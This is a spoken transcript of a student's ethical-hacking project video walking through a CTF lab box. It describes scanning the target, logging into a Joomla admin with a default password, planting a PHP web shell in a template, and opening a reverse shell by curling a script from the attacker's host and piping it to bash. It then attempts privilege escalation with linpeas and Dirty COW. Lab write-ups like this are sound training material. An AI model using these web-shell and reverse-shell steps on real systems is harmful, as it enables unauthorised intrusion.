So today I'll be representing my team. So me, Amar, and Mark for our ethical hacking project. So we decided to go with Hack Trace Range hands-on labs. We have solved two boxes. The first one is Cobra, which is an easy box. However, we haven't found the root flag yet, just the user flag. And then we have also solved another box called Atlas, and we have solved both user and root flag. Now, in this video, I'll start off with um, uh, reproducing the steps I did to actually get into the machine and then get the user flag. So yeah, so here is the IP. We have it here. So let me just change it to my Kali Linux VM. So obviously start off with, I have Linux here, start off with connecting to the Hack Trace Range VPN, and then yeah, will start off with an nmap scan. So the IP here, you can copy it here, and then you can do nmap in SC and in SV for the version of services that are open, ports with the services version included if nmap can find it. And then we want to also maybe just use Mint4 argument. So we use 4 threads to make it faster, and yeah, you can run this. Now I've actually run this already, and I'll put it into a file named nmap scan cobra. So yeah, we'll just read it from the scan I did. Now here, I mean, this is pretty basic, pretty normal for every CTF. We now know that we now know ports that are open with the services on that port. So for example, here we have port 22. I mean, obviously SSH open. We have port 80 and 440. So stuff like HTTP, 440 usually used for HTTPS. Now, from the scan, we know already that most likely this surface is Joomla. So I think based on Googling, I found out that this is a CMS, and you can see here a couple of paths that are available from the service. So yeah, we'll just open the CMS on our Firefox. I have to copy, paste and go. Administrator, directly open the administrator page. Now, the reason why the home page is blank because I changed the PHP code from this admin CMS page. But yeah, it should have been a normal blog page here. But yeah, so what I did is I opened the administrator page and just put admin because we never know, right? But yeah, unfortunately it was right. So yeah, I gained access to the admin page of Joomla, the CMS. Now after looking around and then searching also on Google, I found out that the CMS like Joomla and WordPress has templates, and you can actually customize the templates with PHP code, right? And yeah, I mean, at this point when you can insert any code to a web server or CMS or whatever, I think this is a very good sign because we can basically set up a reverse shell to the service or to the server. Yeah. So here we have a couple of templates. Now, specifically, this was the homepage. The homepage will look like this, but yeah, as I mentioned, I changed the code, the PHP template code into as follows, which is basically just receiving a CMD parameter, URL parameter, and then executing it as a shell command. So shell exec get CMD. So what we'll have here is actually, let me copy this. Then sorry, my keybinds for shortcut does not work in this VM. I'm not sure why, but however, we'll continue. So yeah, so let's say I type something like who am I. Now we executed who am I on this is the server. So www dash data. So then what I did was well, there are a couple of things you can do. You can either directly import like a PHP reverse shell here. You can use something like MSF Venom. I still have the command if I'm not mistaken. Yeah, MSF Venom in P. We want the PHP interpreter reverse TCP shell with the host of our own IP. So 10.18.200.170 port 444. This MSF Venom will give us a PHP code for reverse shell, and we can just put it into the template I showed you before. But yeah, you can also just basically use basic bash reverse shell. So what I did, I like this one better, where I basically put in a bash command for reverse shell. So first I have to set up a netcat, listen to port 4444, and then I have, as I shown you before, .sh script for the client to connect to my computer. Not to connect, but to open a connection, so I can set up a reverse shell. So basically I want this executed. So what I did was I just pass it in the CMD parameter here. So I still have it somewhere here. So yeah, so basically I want to curl from my IP port 9898 slash my reverse.sh to get the the .sh file. I forgot to mention I actually also set up a simple HTTP server on 9898 with Python 3, so I can get files, transfer file easy. And yeah, I set up netcat connection at 4444 as I mentioned before. And now when I click enter, pipe it into bash, so it executes a bash command. It should set up the reverse shell. So now I'm basically in, and at this point I've gained user access, not root access obviously, but here I can actually do stuff. Let's say I can go to home and I can check out stuff here at home. I found user.txt, and if I cut that out, if I print that out, I get the user form. So yeah, obviously as an attacker we don't want to stop here, we want to gain root access. I tried a couple of stuff. I think privilege escalation is quite, at least for me, it's quite hard because I'm not that good at it yet. But attempts that I did was there's this famous tool called Limpias, if I'm not mistaken. So yeah, this basically scans the machine and tells you like things you can do to get able to do privilege escalations. I did that. I actually has the script here, limpias, have the script here, limpias.sh. So let's say, for example, if you want to try it out, 270, 4998, get linkcast.sh, everyone has as you can see here, it scans the machine. I mean, there's a lot of information here, but yeah, I have to wait for a while here. But yeah, another thing I want to highlight, well, that I did try is, let me scroll up a bit, is, where is it? Yeah, CVE exploits. Oh my god, it's not stopping, this scroll is broken. Where is it? There's a lot of stuff here. And by the way, I also increased the font size, so if it's too big, I'm sorry, but I figure maybe it's easier to read if I make it bigger for video purposes. But yeah, where is it? Yeah, I think it's need to scroll further. Sorry, it's taking longer than I thought. I just want to show the here it is. So LinPass detected a couple of CVEs exploits that we can try to execute to gain root access. And then here it includes like the exposure, the probability, like less probable, highly probable. I tried using the dirty cow exploit for like a couple of days now, but yeah, I wasn't able to actually gain root access. I still have the binaries here. See, I have cow root, like these are different. They're dirty cows exploit, but I wasn't able to gain root access. So yeah, I think for this box, yeah, we managed to get the user effect only. And yeah, so the next video I'll walk through on the second box.